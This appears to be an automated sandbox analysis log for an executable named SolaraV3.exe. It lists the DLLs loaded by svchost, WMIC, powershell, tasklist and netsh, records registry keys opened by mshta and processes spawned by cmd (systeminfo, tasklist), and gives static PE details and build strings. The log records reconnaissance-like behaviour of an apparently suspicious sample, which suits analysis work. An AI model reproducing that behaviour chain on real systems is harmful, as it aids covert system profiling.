Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Users\user\Desktop\SolaraV3.exe

File opened: C:\Users\user\Desktop\pyvenv.cfg

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SolaraV3.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SolaraV3.exe

Static file information: File size 6315120 > 1048576

Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SolaraV3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: SolaraV3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
